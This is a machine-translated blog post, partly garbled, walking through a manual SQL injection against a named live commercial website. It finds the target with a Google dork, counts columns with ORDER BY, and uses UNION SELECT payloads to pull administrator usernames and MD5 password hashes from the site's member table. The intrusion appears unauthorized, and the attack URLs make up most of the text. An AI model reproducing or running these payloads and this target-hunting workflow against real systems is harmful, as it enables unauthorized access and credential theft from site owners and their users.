Light said do not practice false bashi, about the script intrusion look at the heart itch, practice a.
First Google:inurl: "Php?id="
Find this site to get injected:
Http://brand.66wz.com/store.php?id=18
Tried the next http://brand.66wz.com/store.php?id=18 and user>0 .
There is a response, the error message appears on the webpage:
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/52/77/wKiom1RkdxLDtG2sAAQ2-6in8ns361.jpg "title=" 1.png " Style= "Float:none;" alt= "wkiom1rkdxldtg2saaq2-6in8ns361.jpg"/>
And then enter
http://brand.66wz.com/store.php?id=18 and order by 5
Error:
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/52/76/wKioL1Rkd4OR_xkuAASLlyo7E7A799.jpg "title=" 2.png " Style= "Float:none;" alt= "wkiol1rkd4or_xkuaasllyo7e7a799.jpg"/>
As prompted, instead:
Http://brand.66wz.com/store.php?id=18 ORDER by 5 DESC LIMIT 0,20
Page OK:
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/76/wKioL1Rkd5Xz8M1oAARIIZNyYAE492.jpg "title=" 5.png " Style= "Float:none;" alt= "wkiol1rkd5xz8m1oaariiznyyae492.jpg"/>
Then change 5 to 30, error.
Change to 20, normal.
······
Finally, the critical value is .
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/52/76/wKioL1Rkd4WjcMsJAARGaaDZeKY972.jpg "title=" 3.png " Style= "Float:none;" alt= "wkiol1rkd4wjcmsjaargaadzeky972.jpg"/>
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/52/76/wKioL1Rkd4zjzYZdAAQ-mEdwV5Q846.jpg "title=" 4.png " Style= "Float:none;" alt= "wkiol1rkd4zjzyzdaaq-medwv5q846.jpg"/>
Then get the following URL via Firefox plugin:
Http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 From tables
Behind the tables I tried a lot of words, such as admin or something, can not.
Ben came here and it was time to end.
Later it felt too pity, holding a try the mentality from the source of the Web page to take a dot keyword Baidu, found a lot of information related to this site: (http://zhangjianbin.iteye.com/blog/1631387)
Among them are:
Brand_admincp_group Management Group
Brand_admincp_member Administrator
Brand_admincp_perm Administrator Privileges
Brand_adminsession Administrator and store admin login count and information judgment
Brand_members member Information
Finally even the source code has:http://code1.okbase.net/codefile/tool.func.php_2012121116304_79.htm
Then enter:
Http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 From Brand_members
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/52/78/wKiom1Rkdzeid5ynAASfqvZnjvo507.jpg "title=" 6.png " Style= "Float:none;" alt= "wkiom1rkdzeid5ynaasfqvznjvo507.jpg"/>
Ok! You can insert a field.
The user name and MD5 encrypted password are obtained by inserting username and password respectively:
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/78/wKiom1RkdzvB9Dm-AASaCFPSP6c089.jpg "title=" 7.png " Style= "Float:none;" alt= "wkiom1rkdzvb9dm-aasacfpsp6c089.jpg"/>
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/76/wKioL1RkeQCRMDbnAAVEEHz5zSk687.jpg "title=" 8.png " alt= "Wkiol1rkeqcrmdbnaaveehz5zsk687.jpg"/>
So how to match username and Passeord , when using the pangolin scan found there is a uid field:
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/7A/wKiom1RkemyzteznAAR9YZEG40g648.jpg "style=" float: none; "title=" 9.png "alt=" Wkiom1rkemyzteznaar9yzeg40g648.jpg "/>
So just add "where Uid=xxxxx" to the URL.
For example:
Http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,username, 11,12,13,14,15,16,17,18,19,20,21,22,23,24 from Brand_members where uid=555157
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/7A/wKiom1Rkeu-jQ5OGAASxpWictcM308.jpg "title=" 10.png "alt=" Wkiom1rkeu-jq5ogaasxpwictcm308.jpg "/>
Http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,password, 11,12,13,14,15,16,17,18,19,20,21,22,23,24 from Brand_members where uid=555157
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/52/78/wKioL1Rke4-iJrzWAAS8gdT_Pt4382.jpg "title=" 11.png "alt=" Wkiol1rke4-ijrzwaas8gdt_pt4382.jpg "/>
Later, MD5 decryption of the time found ...
There are already holes in this website on the dark clouds:
http://www.wooyun.org/bugs/wooyun-2010-046524
It's been quite a long time.
This article is from the "7558298" blog, please be sure to keep this source http://7568298.blog.51cto.com/7558298/1576177
One time PHP manual injection (MySQL)